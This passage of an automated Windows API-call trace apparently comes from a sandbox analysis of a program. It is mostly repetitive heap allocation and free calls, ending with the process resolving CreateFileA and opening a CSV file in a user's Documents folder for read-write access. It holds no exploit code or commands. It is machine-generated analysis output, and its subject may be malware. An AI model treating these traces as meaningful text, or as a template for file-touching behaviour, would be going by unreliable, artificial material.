Flags=0x0, Size=0x10) returned 0x8895c8 [0034.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0034.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0034.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0034.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0034.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0034.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0034.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0034.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0034.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0034.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0034.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0034.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0034.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0034.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0034.601] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.603] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0034.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889670 [0034.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889670, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0034.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.603] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0034.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0034.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889670 [0034.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889670, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0034.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.604] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0034.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0034.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0034.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0034.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0034.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv", cchWideChar=113, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 113 [0034.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x71) returned 0x7800d0 [0034.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv", cchWideChar=113, lpMultiByteStr=0x7800d0, cbMultiByte=113, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv", lpUsedDefaultChar=0x0) returned 113 [0034.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0034.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0034.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0034.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.605] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\nc9n uj.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0034.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0034.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0034.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0034.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0034.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=113, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0034.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe2) returned 0x7c75e8 [0034.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=113, lpWideCharStr=0x7c75e8, cchWideChar=113 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv") returned 113 [0034.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0034.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c5448 [0034.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75e8 | out: hHeap=0x770000) returned 1 [0034.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0034.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0034.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0034.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0034.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0034.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0034.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0034.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: 